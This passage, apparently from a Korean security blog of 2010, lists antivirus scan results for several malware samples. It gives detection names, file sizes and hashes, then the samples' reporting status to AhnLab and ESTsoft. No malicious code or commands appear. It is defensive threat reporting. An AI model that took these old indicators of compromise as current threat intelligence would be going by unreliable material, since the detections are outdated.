Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.ewu
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.zph
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!pa
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Trj/CI.A
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.520303BB
Sophos 4.53.0 2010.05.09 Sus/UnkPack-C
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 -
TrendMicro 9.120.0.1004 2010.05.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.53248.W
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 53248 bytes
MD5...: 03cf9da736a31756cca52595788a4396
SHA1..: 496889dcca7e74de7a936b7287dd3d60ad9d6c8d
SHA256: 675ecc107bf056e259f9585236fdbbc7e9ed3d05e9873405e571599c5f66c425
검사 파일: data.exe 전송 시각: 2010.05.10 00:49:34 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 -
AhnLab-V3 2010.05.09.00 2010.05.08 -
AntiVir 8.2.1.236 2010.05.09 -
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 -
Avast5 5.0.332.0 2010.05.09 -
AVG 9.0.0.787 2010.05.09 -
BitDefender 7.2 2010.05.10 -
CAT-QuickHeal 10.00 2010.05.08 -
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 -
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 -
Ikarus T3.1.1.84.0 2010.05.10 -
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 -
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 -
Microsoft 1.5703 2010.05.09 -
NOD32 5099 2010.05.10 -
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 -
Panda 10.0.2.7 2010.05.09 -
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 -
Sophos 4.53.0 2010.05.09 -
Sunbelt 6283 2010.05.10 -
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 -
TrendMicro 9.120.0.1004 2010.05.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 -
ViRobot 2010.5.8.2306 2010.05.09 -
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 20992 bytes
MD5...: 81b9fb99a58f0e41f1d6c8784dc04397
SHA1..: cd7e5e3b06bdc35e139e307eed89a9f755105997
SHA256: 9df598a6cac3057c277f27e1f02b25b11c4ca648257ab1d182f8266f15a82bf6
검사 파일: DATA.EXE_xor 전송 시각: 2010.05.10 00:50:26 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 -
AhnLab-V3 2010.05.09.00 2010.05.08 ASD.Prevention
AntiVir 8.2.1.236 2010.05.09 TR/Vilsel.acwl.7
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Rootkit-gen
Avast5 5.0.332.0 2010.05.09 Win32:Rootkit-gen
AVG 9.0.0.787 2010.05.09 Win32/PEPatch.BM
BitDefender 7.2 2010.05.10 Generic.Malware.FBg.E55EA39E
CAT-QuickHeal 10.00 2010.05.08 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.PWS.Wsgame.origin
eSafe 7.0.17.0 2010.05.09 Suspicious File
eTrust-Vet None 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Generic.Malware.FBg.E55EA39E
Fortinet 4.1.133.0 2010.05.09 W32/Vilsel.ACWL!tr
GData 21 2010.05.10 Win32:Rootkit-gen
Ikarus T3.1.1.84.0 2010.05.10 -
Jiangmin 13.0.900 2010.05.09 Trojan/Vilsel.gqc
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Vilsel.acwl
McAfee 5.400.0.1158 2010.05.09 Suspect-02!3EA6444D45E6
McAfee-GW-Edition 2010.1 2010.05.09 Artemis!3EA6444D45E6
Microsoft 1.5703 2010.05.09 Trojan:Win32/Meredrop
NOD32 5099 2010.05.10 probably a variant of Win32/PSW.OnLineGames.OUF
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 -
Panda 10.0.2.7 2010.05.09 W32/Spamta.QO.worm
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 -
Sophos 4.53.0 2010.05.09 -
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 -
TrendMicro 9.120.0.1004 2010.05.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 Malware-Cryptor.Win32.Krap
ViRobot 2010.5.8.2306 2010.05.09 -
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 20992 bytes
MD5...: 3ea6444d45e625c2c03887850257a54b
SHA1..: c273744e80632b3f7133a0dca417e99c7bca9f4e
SHA256: c9481aee4d3a87634284f2af34728dab5737b71a1f518dd1aea0a282e2f3d1ef
검사 파일: test.exe 전송 시각: 2010.05.10 00:49:41 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Malware/Win32.Heur.h4
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 -
Avast5 5.0.332.0 2010.05.09 -
AVG 9.0.0.787 2010.05.09 -
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.28134
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.zqo
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Trj/CI.A
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.52031ABB
Sophos 4.53.0 2010.05.09 Sus/UnkPack-C
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 -
TrendMicro 9.120.0.1004 2010.05.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 -
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 52736 bytes
MD5...: 59fa3bd14812eeb10fb978a16d01614b
SHA1..: cd60891c7b11534c264a1378d4ac5d660b732b82
SHA256: 73e0a9a30910bb47e5c9b44964fc6b73a3f5688c54a4ef0e03020721dbafea61

 

모든샘플은 안철수연구소와 이스트 소프트에 신고합니다.

 

[안철수연구소]

1 rl.jpg ~> 분석중
2 exam.asp ~> 분석중
3 ytl.jpg ~> 분석중
4 yt1.jpg ~> 분석중
5 data.exe ~> 분석중 
6 css.htm ~> 분석중
7 time.js ~> 분석중
8 test.exe ~> 분석중
9 NACookieManage.aspx ~> 분석중
10 57.exe ~> V3 : Win-Trojan/Pincav.53248.AZ(추가 : 2010.05.09.00)
11 box.exe ~>V3 : Win-Trojan/Magania.53248.AA(추가 : 2010.05.07.07) 
12 isa.exe ~> V3 : Win-Trojan/Pincav.54784.U(추가 : 2010.05.01.00)
13 lib.asp ~> V3 : JS/Downloader(추가 : 2010.04.23.02)
14 time.asp ~> V3 : JS/Agent(추가 : 2010.04.19.02)

 [이스트 소프트]

오늘 DB에 추가 할 예정!

자세한정보 : http://cafe.naver.com/malzero/56184

댓글을 달아 주세요